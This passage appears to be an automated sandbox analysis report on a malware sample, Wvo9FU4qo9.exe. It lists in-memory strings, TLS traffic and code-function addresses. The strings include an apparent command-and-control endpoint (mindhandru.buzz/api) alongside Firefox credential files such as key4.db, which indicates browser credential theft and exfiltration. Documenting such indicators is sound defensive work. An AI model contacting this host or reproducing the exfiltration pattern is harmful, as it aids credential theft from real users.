                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/%
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1598596473.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1641117823.000000000584F000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598617419.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598795849.000000000584F000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000002.1673430816.000000000584F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/3e
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1598596473.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1570295683.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1570035019.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598617419.0000000005849000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1598795849.000000000584F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ZQ
                Source: Wvo9FU4qo9.exe, Wvo9FU4qo9.exe, 00000000.00000003.1670045021.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1622775705.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000002.1671678492.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1602922474.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1641382602.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1602657804.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1602922474.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1602657804.0000000000FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiryBI
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1673430816.000000000584F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/gL0
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/l
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671523161.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1670178773.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi=
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apiion.txtPK
                Source: Wvo9FU4qo9.exe, 00000000.00000002.1671306790.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apixxd8pi.default-release/key4.dbPK
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571404136.0000000005AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49714 version: TLS 1.2

                System Summary

                barindex
                Source: Wvo9FU4qo9.exeStatic PE information: section name:
                Source: Wvo9FU4qo9.exeStatic PE information: section name: .idata
                Source: Wvo9FU4qo9.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_3_00F7E5D50_3_00F7E5D5
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_3_00F682110_3_00F68211
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004F04600_2_004F0460
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004EC5A00_2_004EC5A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004B86000_2_004B8600
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004BE6870_2_004BE687
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004F0D200_2_004F0D20
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004E8EA00_2_004E8EA0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C12270_2_004C1227
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004E92800_2_004E9280
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DD34A0_2_004DD34A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D74400_2_004D7440
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C57C00_2_004C57C0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D1D000_2_004D1D00
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0056207A0_2_0056207A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058206F0_2_0058206F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005D00670_2_005D0067
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058A0120_2_0058A012
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005DC0110_2_005DC011
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005880160_2_00588016
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F000F0_2_005F000F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005EA0010_2_005EA001
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057E0350_2_0057E035
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C00220_2_005C0022
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005CC0230_2_005CC023
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DA0CA0_2_004DA0CA
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005140CB0_2_005140CB
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006000C10_2_006000C1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C60E90_2_004C60E9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005340F60_2_005340F6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DC0E60_2_004DC0E6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C40F20_2_005C40F2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052E0EC0_2_0052E0EC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006380A30_2_006380A3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DC09E0_2_004DC09E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005AA08F0_2_005AA08F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054C0820_2_0054C082
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0055E0880_2_0055E088
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005640AC0_2_005640AC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006441660_2_00644166
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063A1600_2_0063A160
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005741500_2_00574150
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DC09E0_2_004DC09E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005321400_2_00532140
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005FA1470_2_005FA147
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C81690_2_004C8169
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C21790_2_005C2179
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004B61600_2_004B6160
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063214C0_2_0063214C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052216A0_2_0052216A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005501170_2_00550117
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0061213F0_2_0061213F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0062213C0_2_0062213C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0059A13D0_2_0059A13D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067410C0_2_0067410C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006141170_2_00614117
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D81CC0_2_004D81CC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F41D80_2_005F41D8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005BE1CE0_2_005BE1CE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F61C60_2_005F61C6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005CC1FC0_2_005CC1FC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005921F80_2_005921F8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A01F80_2_005A01F8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0064A1C30_2_0064A1C3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0062E1D70_2_0062E1D7
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005BC19B0_2_005BC19B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005281980_2_00528198
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004DE1800_2_004DE180
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005601800_2_00560180
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0055618F0_2_0055618F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052618F0_2_0052618F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B21B70_2_005B21B7
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0062818E0_2_0062818E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005FE1AE0_2_005FE1AE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052A1AE0_2_0052A1AE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063019D0_2_0063019D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005AE2440_2_005AE244
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0052C2770_2_0052C277
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0053E2640_2_0053E264
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004B42700_2_004B4270
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0056E2680_2_0056E268
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005242100_2_00524210
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057A2100_2_0057A210
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063422E0_2_0063422E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005582360_2_00558236
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058423C0_2_0058423C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0056C23D0_2_0056C23D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004CE2200_2_004CE220
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005622250_2_00562225
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058E22C0_2_0058E22C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A22240_2_005A2224
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A62DE0_2_005A62DE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005442DC0_2_005442DC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005D22D20_2_005D22D2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0051C2C30_2_0051C2C3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005D42CF0_2_005D42CF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0053C2C40_2_0053C2C4
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005602CC0_2_005602CC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D42D00_2_004D42D0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005302F90_2_005302F9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005862E90_2_005862E9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0062A2D60_2_0062A2D6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005422E80_2_005422E8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005CE2820_2_005CE282
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005702BA0_2_005702BA
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005782A70_2_005782A7
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005222A30_2_005222A3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0067E2950_2_0067E295
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0061C2970_2_0061C297
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005463570_2_00546357
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006183710_2_00618371
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0059C37A0_2_0059C37A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E43770_2_005E4377
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006263490_2_00626349
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F836F0_2_005F836F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006483500_2_00648350
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057C3010_2_0057C301
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005903320_2_00590332
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005FE3310_2_005FE331
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B03200_2_005B0320
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0060A3E10_2_0060A3E1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D83D80_2_004D83D8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006423FE0_2_006423FE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B83940_2_005B8394
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057A38A0_2_0057A38A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0053C3B90_2_0053C3B9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054C3BF0_2_0054C3BF
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0061A3940_2_0061A394
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B43A20_2_005B43A2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005923A30_2_005923A3
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0060639D0_2_0060639D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005104510_2_00510451
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004EA4400_2_004EA440
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C644D0_2_005C644D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0059844B0_2_0059844B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A84420_2_005A8442
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054E44A0_2_0054E44A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0060047F0_2_0060047F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0063C45B0_2_0063C45B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005824140_2_00582414
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0058A4150_2_0058A415
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005A04090_2_005A0409
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0057240E0_2_0057240E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005CE43C0_2_005CE43C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0055A4340_2_0055A434
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006024020_2_00602402
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0054A4370_2_0054A437
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005D04360_2_005D0436
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0064A4090_2_0064A409
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E24310_2_005E2431
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C442C0_2_005C442C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0064041C0_2_0064041C
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D04C60_2_004D04C6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006144F20_2_006144F2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D24E00_2_004D24E0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006044CE0_2_006044CE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005504E10_2_005504E1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005EA4E90_2_005EA4E9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0060C4A00_2_0060C4A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005C04990_2_005C0499
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0059E4870_2_0059E487
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005E84BE0_2_005E84BE
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B25560_2_005B2556
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_0055654F0_2_0055654F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005BA5440_2_005BA544
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005145770_2_00514577
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004D45600_2_004D4560
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005FA5610_2_005FA561
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006445250_2_00644525
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F05180_2_005F0518
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005F65140_2_005F6514
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005B650F0_2_005B650F
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_005325050_2_00532505
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_006065000_2_00606500
